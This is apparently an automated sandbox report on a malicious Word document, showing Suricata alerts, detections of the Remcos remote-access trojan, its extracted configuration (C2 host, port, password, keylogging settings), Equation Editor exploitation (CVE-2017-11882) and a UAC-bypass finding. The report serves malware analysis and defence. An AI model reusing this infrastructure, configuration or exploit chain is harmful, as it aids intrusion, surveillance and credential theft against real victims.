                  Source: Registry Key setAuthor: Joe Security: Data: Details: F8 BC 67 43 59 29 BE 56 B0 E1 4E EA 1A 72 4F 4E A5 20 93 B6 A7 9F F7 A0 33 BD 88 4F 68 8C D4 3B 20 47 FE 04 CE AF D6 CC 99 FA 7A D3 52 65 0B 99 61 A0 68 7D 64 97 64 F3 6A A9 13 6E 81 A8 93 EB 02 E7 A1 85 5D 3B CE A6 25 92 FF 89 58 C3 E7 82 E2 6B AC F3 76 83 5B E6 3C 76 E8 1B C5 40 00 0A 03 C2 3D 70 44 BB 60 9A 7D 55 CD 4E AE 57 EE D6 E1 21 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4076, TargetObject: HKEY_CURRENT_USER\Software\Rmc-EPF38I\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T16:24:36.445590+020020204231Exploit Kit Activity Detected91.134.96.17780192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T16:24:36.445590+020020204251Exploit Kit Activity Detected91.134.96.17780192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T16:24:37.947876+020020365941Malware Command and Control Activity Detected192.168.2.224917445.90.89.986845TCP
                  2024-09-30T16:24:39.497208+020020365941Malware Command and Control Activity Detected192.168.2.224917545.90.89.986845TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T16:24:39.279885+020028033043Unknown Traffic192.168.2.2249176178.237.33.5080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Found malware configuration
                  Source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPF38I", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for submitted file
                  Source: AMG Cargo Logistic.docxReversingLabs: Detection: 13%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00404423 FreeLibrary,CryptUnprotectData,16_2_00404423
                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_de6a2b67-d

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 91.134.96.177 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.drStream path '_1789197015/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407538 _wcslen,CoGetObject,13_2_00407538
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
